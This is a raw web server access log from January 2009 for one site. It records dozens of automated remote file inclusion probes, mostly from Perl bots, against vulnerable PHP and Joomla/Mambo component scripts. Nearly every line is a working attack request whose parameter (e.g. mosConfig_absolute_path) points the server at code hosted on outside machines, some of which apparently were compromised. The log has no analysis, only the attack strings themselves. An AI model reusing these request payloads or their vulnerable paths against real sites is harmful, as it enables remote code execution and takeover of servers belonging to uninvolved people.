210.200.170.28 - - [04/Jan/2009:08:00:57 -0800] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.alternativesud.com/ressources/cms/modules/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
210.200.170.28 - - [04/Jan/2009:08:00:58 -0800] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.alternativesud.com/ressources/cms/modules/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.191.227.90 - - [04/Jan/2009:08:01:07 -0800] "GET /logs/scanhttp://www.leegolf.com/vboard/data/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
207.191.227.90 - - [04/Jan/2009:08:01:08 -0800] "GET /scanhttp://www.leegolf.com/vboard/data/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
87.106.16.155 - - [04/Jan/2009:08:01:34 -0800] "GET /logs/access_080907.log//config/einstellungen.inc.php?cm_ext_server=http://www.salvationthroughgrace.com/Ephesians/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.16.155 - - [04/Jan/2009:08:01:34 -0800] "GET /config/einstellungen.inc.php?cm_ext_server=http://www.salvationthroughgrace.com/Ephesians/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.16.155 - - [04/Jan/2009:08:01:34 -0800] "GET /logs//config/einstellungen.inc.php?cm_ext_server=http://www.salvationthroughgrace.com/Ephesians/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.16.155 - - [04/Jan/2009:08:01:34 -0800] "GET /logs/access_080629.log//config/einstellungen.inc.php?cm_ext_server=http://www.salvationthroughgrace.com/Ephesians/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.10.107 - - [04/Jan/2009:08:01:40 -0800] "GET /logs/access_080503.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://jeticu.com/ktmlpro/includes/ktedit/ctrl.txt????%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.10.107 - - [04/Jan/2009:08:01:40 -0800] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://jeticu.com/ktmlpro/includes/ktedit/ctrl.txt????%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.10.107 - - [04/Jan/2009:08:01:41 -0800] "GET /index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://jeticu.com/ktmlpro/includes/ktedit/ctrl.txt????%0D?? HTTP/1.1" 200 95279 "-" "libwww-perl/5.803" "www.dmulk.com"
207.191.227.90 - - [04/Jan/2009:08:01:45 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.turismonellemarche.it/images/baru.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
207.191.227.90 - - [04/Jan/2009:08:01:45 -0800] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.turismonellemarche.it/images/baru.txt?? HTTP/1.1" 200 50 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
91.121.10.107 - - [04/Jan/2009:08:01:49 -0800] "GET /logs/access_080824.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://jeticu.com/ktmlpro/includes/ktedit/ctrl.txt????%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.12.17.42 - - [04/Jan/2009:08:01:57 -0800] "GET /logs/access_080227.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.alternativesud.com/ressources/cms/modules/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.15.58.12 - - [04/Jan/2009:08:02:07 -0800] "GET /logs/includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.58.12 - - [04/Jan/2009:08:02:07 -0800] "GET /includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.191.227.90 - - [04/Jan/2009:08:02:14 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://weblime.ru/seahorse/mambo??? HTTP/1.1" 200 50 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
207.191.227.90 - - [04/Jan/2009:08:02:14 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://weblime.ru/seahorse/mambo??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
140.125.155.1 - - [04/Jan/2009:08:02:16 -0800] "GET /logs/administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
140.125.155.1 - - [04/Jan/2009:08:02:16 -0800] "GET /administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.55.139.190 - - [04/Jan/2009:08:02:20 -0800] "GET /logs/access_080321.log/index.php?pg=http://www.arhi-house.ru/htaccess.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
218.234.18.127 - - [04/Jan/2009:08:02:29 -0800] "GET /register.php/config.php?xcart_dir=http://www.csjh.tpc.edu.tw/~sw/board/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
218.234.18.127 - - [04/Jan/2009:08:02:29 -0800] "GET /logs//register.php/config.php?xcart_dir=http://www.csjh.tpc.edu.tw/~sw/board/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
140.125.155.1 - - [04/Jan/2009:08:02:36 -0800] "GET /logs/includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
140.125.155.1 - - [04/Jan/2009:08:02:37 -0800] "GET /includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.222.40.154 - - [04/Jan/2009:08:02:47 -0800] "GET //administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
140.125.155.1 - - [04/Jan/2009:08:02:51 -0800] "GET /logs/administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
140.125.155.1 - - [04/Jan/2009:08:02:52 -0800] "GET /administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.222.23.200 - - [04/Jan/2009:08:02:56 -0800] "GET /logs/access_080810.log///administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.222.23.200 - - [04/Jan/2009:08:02:56 -0800] "GET //administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.222.23.200 - - [04/Jan/2009:08:02:57 -0800] "GET /logs///administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.55.139.190 - - [04/Jan/2009:08:03:14 -0800] "GET /logs//customize.php?path=http://www.arhi-house.ru/htaccess.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.55.139.190 - - [04/Jan/2009:08:03:14 -0800] "GET /customize.php?path=http://www.arhi-house.ru/htaccess.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
83.222.23.200 - - [04/Jan/2009:08:03:21 -0800] "GET /logs/access_080425.log///administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.53.78 - - [04/Jan/2009:08:03:28 -0800] "GET //administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.195.185.194 - - [04/Jan/2009:08:03:29 -0800] "GET //administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
140.125.155.1 - - [04/Jan/2009:08:03:53 -0800] "GET /logs/administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
140.125.155.1 - - [04/Jan/2009:08:03:54 -0800] "GET /administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
140.125.155.1 - - [04/Jan/2009:08:04:06 -0800] "GET /logs/includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.176.232.101 - - [04/Jan/2009:08:04:06 -0800] "GET /logs/access_080223.log///administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
140.125.155.1 - - [04/Jan/2009:08:04:06 -0800] "GET /includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.176.232.101 - - [04/Jan/2009:08:04:06 -0800] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
81.176.232.101 - - [04/Jan/2009:08:04:07 -0800] "GET /logs///administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
140.125.155.1 - - [04/Jan/2009:08:04:17 -0800] "GET /logs/includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
140.125.155.1 - - [04/Jan/2009:08:04:18 -0800] "GET /includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.18.151.242 - - [04/Jan/2009:08:04:20 -0800] "GET /claroline/phpbb/page_tail.php?includePath=http://www.northshoredojo.net/images/footer.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
67.18.151.242 - - [04/Jan/2009:08:04:20 -0800] "GET /logs//claroline/phpbb/page_tail.php?includePath=http://www.northshoredojo.net/images/footer.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
200.54.154.10 - - [04/Jan/2009:08:04:22 -0800] "GET /administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
140.125.155.1 - - [04/Jan/2009:08:04:22 -0800] "GET /logs/administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.55.139.190 - - [04/Jan/2009:08:04:23 -0800] "GET /logs/access_080522.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.arhi-house.ru/htaccess.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
140.125.155.1 - - [04/Jan/2009:08:04:23 -0800] "GET /administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.55.139.190 - - [04/Jan/2009:08:04:23 -0800] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://www.arhi-house.ru/htaccess.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.55.139.190 - - [04/Jan/2009:08:04:23 -0800] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.arhi-house.ru/htaccess.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
121.170.11.100 - - [04/Jan/2009:08:04:25 -0800] "GET /logs/access_080103.log///akocomments.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
140.125.155.1 - - [04/Jan/2009:08:04:25 -0800] "GET /logs/includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
121.170.11.100 - - [04/Jan/2009:08:04:26 -0800] "GET //akocomments.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
140.125.155.1 - - [04/Jan/2009:08:04:26 -0800] "GET /includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
121.170.11.100 - - [04/Jan/2009:08:04:26 -0800] "GET /logs///akocomments.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.55.139.190 - - [04/Jan/2009:08:04:43 -0800] "GET /logs/access_080801.log//include/admin.lib.inc.php?site_path=http://www.arhi-house.ru/htaccess.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.55.139.190 - - [04/Jan/2009:08:04:43 -0800] "GET /include/admin.lib.inc.php?site_path=http://www.arhi-house.ru/htaccess.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.55.139.190 - - [04/Jan/2009:08:04:44 -0800] "GET /logs//include/admin.lib.inc.php?site_path=http://www.arhi-house.ru/htaccess.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
218.38.13.108 - - [04/Jan/2009:08:04:46 -0800] "GET /logs/components/com_moodle/moodle.php?mosConfig_absolute_path=http://spass.huneck.eu/id/idfeelcomz.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
218.38.13.108 - - [04/Jan/2009:08:04:46 -0800] "GET /logs/access_081024.log/components/com_moodle/moodle.php?mosConfig_absolute_path=http://spass.huneck.eu/id/idfeelcomz.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
218.38.13.108 - - [04/Jan/2009:08:04:46 -0800] "GET /components/com_moodle/moodle.php?mosConfig_absolute_path=http://spass.huneck.eu/id/idfeelcomz.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
89.36.39.203 - - [04/Jan/2009:08:04:51 -0800] "GET /logs/access_080928.log///administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.14.80.68 - - [04/Jan/2009:08:04:56 -0800] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.karensscrappin.com.au/moodledata/1/recipefolio/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.14.80.68 - - [04/Jan/2009:08:04:56 -0800] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.karensscrappin.com.au/moodledata/1/recipefolio/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.14.80.68 - - [04/Jan/2009:08:04:56 -0800] "GET /logs/access_080228.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.karensscrappin.com.au/moodledata/1/recipefolio/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.14.80.68 - - [04/Jan/2009:08:04:56 -0800] "GET /logs/access_080506.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.karensscrappin.com.au/moodledata/1/recipefolio/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
218.38.13.108 - - [04/Jan/2009:08:05:14 -0800] "GET /logs/access_081102.log/components/com_moodle/moodle.php?mosConfig_absolute_path=http://spass.huneck.eu/id/idfeelcomz.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
72.30.81.169 - - [04/Jan/2009:08:05:17 -0800] "GET /logs/access_070705.log HTTP/1.0" 200 50888 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
72.30.81.169 - - [04/Jan/2009:08:05:19 -0800] "GET /logs/access_071228.log HTTP/1.0" 200 398582 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
81.176.232.101 - - [04/Jan/2009:08:05:21 -0800] "GET /logs/access_080523.log///administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
85.214.53.78 - - [04/Jan/2009:08:05:23 -0800] "GET /logs/access_080720.log///administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.214.53.78 - - [04/Jan/2009:08:05:23 -0800] "GET //administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.214.53.78 - - [04/Jan/2009:08:05:24 -0800] "GET /logs///administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.55.139.190 - - [04/Jan/2009:08:05:25 -0800] "GET /logs/access_081017.log//include/admin.lib.inc.php?site_path=http://www.arhi-house.ru/htaccess.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.55.139.190 - - [04/Jan/2009:08:05:26 -0800] "GET /logs/access_080226.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.arhi-house.ru/htaccess.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
85.214.53.78 - - [04/Jan/2009:08:05:28 -0800] "GET /logs/access_080404.log///administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.176.232.101 - - [04/Jan/2009:08:05:36 -0800] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
140.125.155.1 - - [04/Jan/2009:08:05:37 -0800] "GET /logs/administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
140.125.155.1 - - [04/Jan/2009:08:05:37 -0800] "GET /administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.176.232.101 - - [04/Jan/2009:08:05:56 -0800] "GET /logs///administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
81.176.232.101 - - [04/Jan/2009:08:05:56 -0800] "GET //administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.182.137.218 - - [04/Jan/2009:08:06:28 -0800] "GET /errors.php?error=http://www.hotelsunflower.it/images/smilies/rhs/list.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
207.182.137.218 - - [04/Jan/2009:08:06:28 -0800] "GET /logs/errors.php?error=http://www.hotelsunflower.it/images/smilies/rhs/list.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
77.222.40.154 - - [04/Jan/2009:08:06:33 -0800] "GET /logs/access_081101.log///administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.222.40.154 - - [04/Jan/2009:08:06:33 -0800] "GET //administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.222.40.154 - - [04/Jan/2009:08:06:33 -0800] "GET /logs///administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.67.202.153 - - [04/Jan/2009:08:06:55 -0800] "GET /logs/access_080412.log/?sourcedir=http://www.suntalent.com.tw//appserv/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.68" "www.dmulk.com"
212.67.202.153 - - [04/Jan/2009:08:06:59 -0800] "GET /?sourcedir=http://www.suntalent.com.tw//appserv/id??? HTTP/1.1" 200 94756 "-" "libwww-perl/5.68" "www.dmulk.com"
212.67.202.153 - - [04/Jan/2009:08:07:01 -0800] "GET /logs/?sourcedir=http://www.suntalent.com.tw//appserv/id??? HTTP/1.1" 200 80886 "-" "libwww-perl/5.68" "www.dmulk.com"
87.106.16.155 - - [04/Jan/2009:08:07:03 -0800] "GET /logs/einstellungen.inc.php?cm_ext_server=http://www.salvationthroughgrace.com/Ephesians/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.16.155 - - [04/Jan/2009:08:07:03 -0800] "GET /einstellungen.inc.php?cm_ext_server=http://www.salvationthroughgrace.com/Ephesians/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.16.155 - - [04/Jan/2009:08:07:03 -0800] "GET /logs/access_080907.log/einstellungen.inc.php?cm_ext_server=http://www.salvationthroughgrace.com/Ephesians/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.195.185.194 - - [04/Jan/2009:08:07:09 -0800] "GET /logs/access_080720.log///administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.195.185.194 - - [04/Jan/2009:08:07:10 -0800] "GET //administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.106.16.155 - - [04/Jan/2009:08:07:10 -0800] "GET /logs/access_080629.log/einstellungen.inc.php?cm_ext_server=http://www.salvationthroughgrace.com/Ephesians/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.195.185.194 - - [04/Jan/2009:08:07:11 -0800] "GET /logs///administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.106.16.155 - - [04/Jan/2009:08:07:17 -0800] "GET /logs/access_080629.log%20//config/einstellungen.inc.php?cm_ext_server=http://www.salvationthroughgrace.com/Ephesians/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.55.139.190 - - [04/Jan/2009:08:07:21 -0800] "GET /logs/access_081117.log//modules/Forums/admin/errors.php?error=http://www.arhi-house.ru/htaccess.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.55.139.190 - - [04/Jan/2009:08:07:21 -0800] "GET /modules/Forums/admin/errors.php?error=http://www.arhi-house.ru/htaccess.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.55.139.190 - - [04/Jan/2009:08:07:22 -0800] "GET /logs//modules/Forums/admin/errors.php?error=http://www.arhi-house.ru/htaccess.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
121.170.11.100 - - [04/Jan/2009:08:07:30 -0800] "GET /logs/access_080312.log///admin/index.php?o=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
